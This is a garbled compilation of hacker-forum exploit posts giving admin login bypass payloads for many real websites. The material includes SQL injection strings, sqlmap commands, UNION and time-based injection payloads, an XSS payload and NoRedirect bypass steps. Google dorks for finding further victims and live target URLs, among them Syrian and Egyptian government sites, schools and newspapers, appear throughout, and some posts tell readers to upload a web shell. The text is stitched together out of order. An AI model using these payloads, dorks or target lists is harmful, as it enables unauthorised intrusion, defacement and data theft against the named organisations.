+++++++++++++[ Fri Nov 24 16:59:05 WIB 2023 ]++++++++++++++++

|[+] Demo:
(username)= '=' 'or
Demo site: www.dec.gov.sy/immediate-panel.php
|[+] Exploit Author: s49_hack
|[+] Exploit Title: ‫ وزارة الكهرباء السورية‬Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: www.dec.gov.sy/immediate-panel.php
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: nabdalneelain.org/admin/login
or : username: admin
password: admin
|[+] Exploit Author: s49_hack
|[+] Exploit Title: Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: nabdalneelain.org/admin/login
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: http://196.219.219.187/HIO/admin/Login.aspx
Demo site: http://196.219.219.187/HIOwoman/admin/Login.aspx
or : username: admin
password: 123
|[+] Exploit Author: s49_hack
|[+] Exploit Title: ‫ التأمين الصحي المصري‬Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: http://196.219.219.187/HIO/admin/Login.aspx
|[+] Vendor site: http://196.219.219.187/HIOwoman/admin/Login.aspx
|[+] instagram: @s49_hack

user_pass : 'or''='
|[+] Demo:
Demo site: http://www.alblaad.com/cp/
OR :
password: admin
username: admin
|[+] Exploit Author: s49_hack
|[+] Exploit Title: ‫ جريدة البالد الكويتية‬Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: http://www.alblaad.com/cp/
|[+] instagram: @s49_hack

user_pass : 'or''='
|[+] Demo:
Demo site: https://www.saudisalons.com/admin/index.php
[+] Exploit Title: saudisalons Admin Login Bypass
or :
username: admin
|[+] Exploit Author: s49_hack
|[+] Tested on: Kali Linux
|[+] Vendor site: https://www.saudisalons.com/admin/index.php
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: http://www.alrasedkw.com/cp/
or :
password: admin
username: admin
|[+] Exploit Title: ‫ جريدة الراصد الكويتية‬ADMIN LOGIN BYPASS
|[+] Tested on: Kali Linux
|[+] Vendor site: http://www.alrasedkw.com/cp/
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: http://system.resaladk.org
or : username: admin
|[+] Exploit Author: s49_hack
|[+] Exploit Title: resalaadk Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: http://system.resaladk.org
|[+] instagram: @s49_hack

http://bhagirath.co.in/admin/login.php
http://franchisemart.in/admin/login.php
http://gcsl.co.in/admin/login.php
http://jyotigroup.in/admin/login.php
http://pehchanpro.com/admin/login.php
# Date: 07/30/2017
# Exploit Author: Gh05t666include
# Exploit Title: Pro CMS Pro Designz Bypass Admin No Redirect
# Google Dork: Powered By : Pro Designz
# Software Link: https://www.prodesignz.net/portfolio/pro-cms/
# Tested on: Windows / Linux / MacOS
# Vendor Homepage: https://www.prodesignz.net/
1. Go to Admin Page in http://(Domain name)/admin/login.php
2. Install Bypass No Redirect Plugins in Mozilla Firefox
2017.07.30
3. Submit Victim Domain http://(Domain name)/admin/login.php in Bypass No Redirect
4. And go to http://(Domain name)/admin/
CVE: N/A
CWE: N/A
Demo :
Demo site: 07/30/2017
Demo site: N/A
Demo site: https://addons.mozilla.org/en-US/firefox/addon/noredirect/
Demo site: https://www.prodesignz.net/
Demo site: https://www.prodesignz.net/portfolio/pro-cms/
Demo site: http://(Domain name)/admin/
Demo site: http://(Domain name)/admin/login.php
Demo site: http://(Domain name)/admin/login.php in Bypass No Redirect
Demo site: http://bhagirath.co.in/admin/login.php
Demo site: http://franchisemart.in/admin/login.php
Demo site: http://gcsl.co.in/admin/login.php
Demo site: http://jyotigroup.in/admin/login.php
Demo site: http://pehchanpro.com/admin/login.php
Dork: Powered By : Pro Designz
Download and Install Plugin here :
https://addons.mozilla.org/en-US/firefox/addon/noredirect/
Home Page
Local: No
Pro CMS Pro Designz Bypass Admin No Redirect
Remote: Yes
Risk: Medium
id Gh05t666include (ID) id

# Date: 23/07/2020
# Dork:inurl:/backoffice/login.php
# Exploit Author:H9xHacker
# Exploit Title:OBE - Bypass admin with Noredirect
# Tested on:Linux
#Demo:
------------------------
Demo site: 23/07/2020
Demo site: http://site.com/backoffice/index.php
Demo site: http://site.com/backoffice/login.php
Demo site: http://www.serial.pt/backoffice/login.php
Demo site: http://www.unicor.pt/backoffice/login.php
Demo site: https://ilustracaosjm.pt/backoffice/login.php
Demo site: https://www.abedigitalsolutions.com/backoffice/login.php
Demo site: https://www.plakamat.pt/backoffice/login.php
Reverse check bing.com
http://www.serial.pt/backoffice/login.php
http://www.unicor.pt/backoffice/login.php
https://ilustracaosjm.pt/backoffice/login.php
https://www.abedigitalsolutions.com/backoffice/login.php
https://www.plakamat.pt/backoffice/login.php
ip:72.55.140.20 backoffice/login.php OR ip:72.55.140.20 .php?id= (There are 95
domains hosted on this server).
open http://site.com/backoffice/login.php
then open http://site.com/backoffice/index.php
use NoRedirect tool & add http://site.com/backoffice/login.php

[Bypass Admin panel]

[SQL injection]
[XSS Vulnerability]
Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND
'rCId'=
Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd
Payload: catid=15' UNION ALL SELECT
CONCAT(0x716b767171,0x6c746c51566743754d
Title: AND boolean-based blind - WHERE or HAVING clause
Title: Generic UNION query (NULL) - 19 columns
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Type: UNION query
Type: boolean-based blind
Type: time-based blind

###################################################################################
########################################
========================================================================|
[+] - UNION query
[+] Method ( Sql injection ) Ictus Security Team of Iran
[+] Method :"><script>alert('Aryan Chehreghani |
Ictus_TM')</script><"
[+] Testing Method:
[+] Type Code IN search Value / some Value
[+] http://ncrlife.in/latestnews.php?catid=25[SQL]
[+] parameter : id = latestnews.php?catid=25
[=] T.me/Clvsornapv
###################################################################################
########################################
'rCId
+ Auxiliary software : http://sqlmap.org
+ Date: 2020-06-05
+ Dork 1 : intext:Design by Dassinfotech.com
+ Dork 2 : inurl:detailsnews.php?id=
+ Dork 3 : intext:Design by Dassinfotech.com inurl:detailsnews.php?id=
+ Dork 4 : inurl:php?id= intext:Design By Dassinfotech.com
+ Dork CVE: CVE-2019-13409
+ Dork CWE : CWE-89
+ Exploit Author : Aryan Chehreghani | Ictus_TM
+ Exploit Title: News website CMS SQL injection & Bypass Admin Panel &&
XSS Vulnerability By Aryan Chehreghani
+ Tested on: win,linux,mac
+ Vendor Homepage: https://www.dassinfotech.com
+ Version: All Version
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NUL
========================================================================|
Demo site: http://sqlmap.org
Demo site: https://www.dassinfotech.com
Demo site: http://ncrlife.in/latestnews.php?catid=25[SQL]
Demo site: http://target.com/latestnews.php?catid=25 --dbs
Demo:
Exploit ==>
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL-- -
[+] Payload U / P : '=''or' / '=''or'
[+]Login Pages : victim.com/matri/login.php victim.com/india/login.php
[+]Using Sqlmap Example : sqlmap -u http://target.com/latestnews.php?catid=25 --dbs
__________SQLMAP__________result :
arameter: catid (GET)
latestnews.php?catid=-23%27%20union%20select
%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fR
om%20admin--%20-
||||||||||||||||||||||| Parameter: sec (GET) || |||||||||||||||||||||||

2. ' or 1=1 limit 1 -- -+

2. inurl:zoom-admin intitle:Login : Admin
Admin page : /zoom-admin/index.php
Demo site: /zoom-admin/index.php
Demo site: 2020/6/1
Google search : "Powered By Zoom Web Media" | inurl:zoom-admin
intitle:Login : Admin
Usage Username & Password : 1. '=''OR'
[+] Category : webapps
[+] DORKS : 1. "Powered By Zoom Web Media"
[+] Date : 2020/6/1
[+] Exploit Author : nginxDEX
[+] Tested on : Windows
[+] Title : Zoom Web Media - Admin Login bypass
[+][+][+] TUTORIAL [+][+][+][+]

# Admin Page :
# Date : 24 / 05 / 2020
# Demo :
# Dork :
# Exploit Author : Xmall75
# Exploit Title : Dassinfotech CMS SQL Injection Bypass Admin Vulnerability
# Payload U / P : '=''or' / '=''or'
# SQL Injection :
# Step :
# Tested on : Windows 7
# Vendor Homepage : www.dassinfotech.com
- Crot.
- Dorking on the Google.
- Fill the username and password using the payload that i gave.
- Open the admin page.
- Upload your shell.
Demo site: www.patrakarbaba.com/india/login.php
Demo site: www.samacharvarta.com/matri2/login.php
Demo site: www.target.com/detailsnews.php?id=your payload.
Demo site: www.target.com/india/login.php
Demo site: www.target.com/matri/login.php
Demo site: www.twodaughtersclub.com/india/login.php
Demo site: www.vkbpl.in/india/login.php
intext:Design by Dassinfotech.com
inurl:detailsnews.php?id=
www.patrakarbaba.com/india/login.php
www.samacharvarta.com/matri2/login.php
www.target.com/detailsnews.php?id=your payload.
www.target.com/india/login.php
www.target.com/matri/login.php
www.twodaughtersclub.com/india/login.php
www.vkbpl.in/india/login.php

# Admin Vuln :
# Author [ Discovered By ] : EbRaHiM-VaKeR
# Category : WebApps
# Date : 2020/04/10
# Discovered By EbRaHiM-VaKeR from IranonymousTm
# Example Vuln :
# Exploit Risk : Medium
# Exploit Title : OnlineShop Cms Sql & Admin Bypass
# Member: 4min.x / Kaveh Turk / Mr JxRoot / J3N
# Site: http://iranonymous.ir
# Team : Iranonymous Team
# Tested On : Windows and Linux
# Vendor Homepage : https://github.com/0dayherman/OnlineShop/
###################################################################
#Google Dork: N/A
Demo site: 2020/04/10
Demo site: N/A
Demo site: http://iranonymous.ir
Demo site: https://github.com/0dayherman/OnlineShop/
Demo site: http://localhost8080/OnlineShop/login.php
Demo site: http://localhost8080/OnlineShop/view.php?id=3
[+] http://localhost:8080/OnlineShop/login.php
[+] http://localhost:8080/OnlineShop/view.php?id=3
user & Password: '=''or'

# Blogspot : https://lightcyberindo.blogspot.com
# Contact
# Demo
# Dork : intext:Designed and Developed by Vibhuti Infotech
# Exploit Author : ./MiSetya
# Exploit Title : Designed and Developed by Vibhuti Infotech - Bypass Admin
# Greetz
# Risk : Low
# Website : http://lightcyberindonesia.dx.am
- Email : jimmisetiawan54@gmail.com
- Light Cyber Indonesia
- Telegram : t.me/misetya
- http://www.gayatrinursing.org/admin
Demo site: ./MiSetya
Demo site: http://lightcyberindonesia.dx.am
Demo site: https://lightcyberindo.blogspot.com
Demo site: t.me/misetya
Demo site: http://www.gayatrinursing.org/admin

This refers to an attacker gaining access equivalent to an authenticated user

without ever going
# Authentication Bypass / Improper Authentication / Admin Panel Login Bypass
Exploit :
# Author [ Discovered By ] : KingSkrupellos
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Category : WebApps
# Date : 13/04/2020
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
# Exploit Risk : Medium
# Exploit Title : Pinnacle India Solution Admin Authentication Bypass
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Impact :
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# Pastebin : pastebin.com/u/KingSkrupellos
# Team : Cyberizm Digital Security Army
# Tested On : Windows and Linux
# Vendor Homepage : pinnacleindia.com
# Vulnerability Type : CWE-287 [ Improper Authentication ]
####################################################################
***********
******************************************************************************
/admin/admin-login.php
/admin/album.php
/admin/call-request.php
/admin/course-details.php
/admin/home-slider.php
/admin/noticeboard.php
/admin/recent-video.php
/admin/recentevent.php
/admin/selection.php
/admin/testimonial.php
/admin/upload1.php
/admin/upload2.php
/admin/web-query.php
A software incorrectly validates user's login information and as a result, an
attacker can
Admin Panel Login Path :
Admin Password : '=''or'
Admin Username : '=''or'
An attacker gains access to application, service, or device with the privileges
Authentication is any process by which a system verifies the identity of a user who
wishes
CAPEC-115 [ Authentication Bypass ]
CAPEC-115: Authentication Bypass
CWE-287 [ Improper Authentication ]
Demo site: 13/04/2020
Demo site: cxsecurity.com/author/KingSkrupellos/1/
Demo site: exploit4arab.org/author/351/KingSkrupellos
Demo site: packetstormsecurity.com/files/authors/13968
Demo site: pastebin.com/u/KingSkrupellos
For example, a web site might assume that all users will click through a given link
in order to get to
Reverse IP results (148.66.138.161)
Reverse IP results (107.180.3.164)
The attacker is therefore able to access protected data without authentication ever
having taken place.
The weakness is introduced during Architecture and Design, Implementation stages.
There are 248 domains hosted on this server.
There are 482 domains hosted on this server.
able to reach secured web content by explicitly entering the path to the content
rather than clicking
access procedure that does not go through the proper checkpoints where
authentication should occur.
faking authentication by exploiting flaws or by stealing credentials from
legitimate users.
gain certain privileges within the application or disclose sensitive information
that allows
occurs when an application improperly verifies the identity of a user.
of an authorized or privileged user by evading or circumventing an authentication
mechanism.
other authentication attacks in that attacks of this pattern avoid authentication
entirely, rather than
prove or insufficiently proves that the claim is correct. Improper authentication
secure material and simply authenticate everyone that clicks the link. However, an
attacker might be
them to access sensitive data and provoke arbitrary code execution.
through an authentication procedure. This is usually the result of the attacker
using an unexpected
through the authentication link, thereby avoiding the check entirely. This attack
pattern differs from
to access it.When an actor claims to have a given identity, the software does not

Admin page: Site.ir/log/vorood.php

Password: ' or 1#
Username: ' or 1#

# CVE: N/A
# Category : webapps
# Date: 2020-04-12
# Exploit Author: kodak
# Exploit Title: Vorood Admin Login Bypass
# Google Dork: inurl:vorood.php
# Tested on: Kali Linux / Windows 7
-------------------------------------------------
Demo site: N/A
Demo site: Site.ir/log/vorood.php
Demo site: http://www.vamam.ir/log/vorood.php
Open target
Search the dork in Google
[+] DEMO
http://www.vamam.ir/log/vorood.php

# Author [ Discovered By ] : EbRaHiM-VaKeR

# Category : WebApps
# Date : 2020/04/07
# Discovered By EbRaHiM-VaKeR from IranonymousTm
# Example Vulnerable Sites :
# Exploit Risk : High
# Exploit Title : 3solutions.cz Admin Page Bypass
# Site: http://iranonymous.ir
# Team : Iranonymous Team
# Tested On : Windows and Linux
# Vendor Homepage : http://3solutions.cz/
###################################################################
#Google Dork:
(Use Your brain :v)
*************************
4min.x / Kaveh Turk / Mr JxRoot / J3N
Demo site: 2020/04/07
Demo site: http://3solutions.cz/
Demo site: http://iranonymous.ir
Demo site: http://www.svetgrilu.cz/admin/index.php
Demo site: http://www.topkraft.cz/admin/index.php
Demo site: https://www.ragtime.cz/admin/index.php
[+] http://www.svetgrilu.cz/admin/index.php
[+] http://www.topkraft.cz/admin/index.php
[+] https://www.ragtime.cz/admin/index.php
intext:Email: info@3solutions.cz , Hotline: +420 739 950 035

Demo site: N/A

Demo site: http://alltimecargo.com/
Demo site: http://alltimecargo.com/login.php
http://alltimecargo.com/login.php
user_pass::> 'or''='
|[+] # und3rgr0und Red Hacker #
|[+] Tested on: Windows 10
|[+] Demo:
|[+] Exploit Author: Bl4ck M4n
|[+] Exploit Title: Design by Afireweb Admin Login Bypass
|[+] Google Dork: N/A
|[+] Vendor site: http://alltimecargo.com/

AUTHOR: Mustafa Öztaş

Admin Panel Bypass Exploit
Demo site: http://mariasantisima.edu.ve/sirea/login.php
Dork:intext:2020 © ClasesIT - SIREA. Derechos reservados
Example:
Login Succesfull!
OR
TWİTTER:twitter.com/oztas_py
http://mariasantisima.edu.ve/sirea/login.php
password: '=''or'
tested by linux
url:site/sirea/includes/conectar/login.php
url:site/sirea/login.php
username: '=''or'

# Date: 2020-03-24
# Demo:
# Exploit :
# Exploit Author: Nobody
# Exploit Title: Dinamik İşler Tasarım ve Tanıtım Hizmetleri - Bypass Admin Panel
with Noredirect
# Google Dork : /sayfa/form/01/iletisimformu
# Tested on: Windows / Mozilla Firefox
# Use Noredirect and Change it /admin/login.php to /admin/index.php
# Vender Homepage : https://www.dinamikisler.com/
# https://www.burdurkardelencicek.com/admin/
# https://www.cicekkurdu.com/admin/
# https://www.dorukcicekcilik.com/admin/
# https://www.lavantacicekevi.com/admin/
# https://www.sibelisacicek.com/admin/
#####################################################
Demo site: /sayfa/form/01/iletisimformu
Demo site: https://www.dinamikisler.com/
Demo site: https://www.burdurkardelencicek.com/admin/
Demo site: https://www.cicekkurdu.com/admin/
Demo site: https://www.dorukcicekcilik.com/admin/
Demo site: https://www.lavantacicekevi.com/admin/
Demo site: https://www.sibelisacicek.com/admin/

# Discovered By A-Searcher
# takhrib@gmx.com
# Date: 2020-03-22
# Exploit Author: A-Searcher
# Exploit Title: BALAS INDUSTRIES Admin Login Bypass
# Google Dork : N/A
# Panel:
# Tested on: Windows / Mozilla Firefox
# Username & Password : '=' 'or'
# Vender Homepage : N/A
#####################################################
#####################################################
#http://www.balasfurniture.com/admin/index.php
Demo site: N/A
Demo site: http://www.balasfurniture.com/admin/index.php

# Date: 2020-03-22
# Demo:
# Exploit Author: HUNT3R L!ON
# Exploit Title: Worldviewer Admin Panel Bypass
# Google Dork : intext:"Created by: Worldviewer.in. "
# Pass : '=' 'OR'
# Team: BD Grey Hat Hackers
# Tested on: Windows / Mozilla Firefox
# User : '=' 'OR'
# Vender Homepage : Worldviewer.in
# https://alappuzha.com/admin/
# https://athirappally.com/admin/
# https://vagamon.com/admin/
# https://www.kumarakom.com/admin/
#####################################################
#Admin Panel : http://www.website/admin
Demo site: http://www.website/admin
Demo site: https://alappuzha.com/admin/
Demo site: https://athirappally.com/admin/
Demo site: https://vagamon.com/admin/
Demo site: https://www.kumarakom.com/admin/

# Author : ./Mi1337
# Blogspot : https://lightcyberindo.blogspot.com
# Contact Me
# Demo
# Dork : intext:Created By SR Edu
# Exploit Name : Created by SR Edu - Bypass Admin
# Greetz
# PoC
# Risk : Medium
# Team : Light Cyber Indonesia
- Acces your shell at localhost:8080/admin/gallery/yourshell.php
- Add /admin behind the website, will automatically be redirected to the login page
(ex : localhost/admin)
- Dorking on google using dork above
- Email : jimmisetiawan54@gmail.com
- My Team : Light Cyber Indonesia (From Indonesia to World Team)
- Telegram : t.me/misetya
- Upload your shell at localhost:8080/admin/add-gallery.php
- User : '="or' / Pass : '="or'
- http://carmelschoolbdk.com/admin/
Demo site: ./Mi1337
Demo site: https://lightcyberindo.blogspot.com
Demo site: localhost/admin)
Demo site: t.me/misetya
Demo site: http://carmelschoolbdk.com/admin/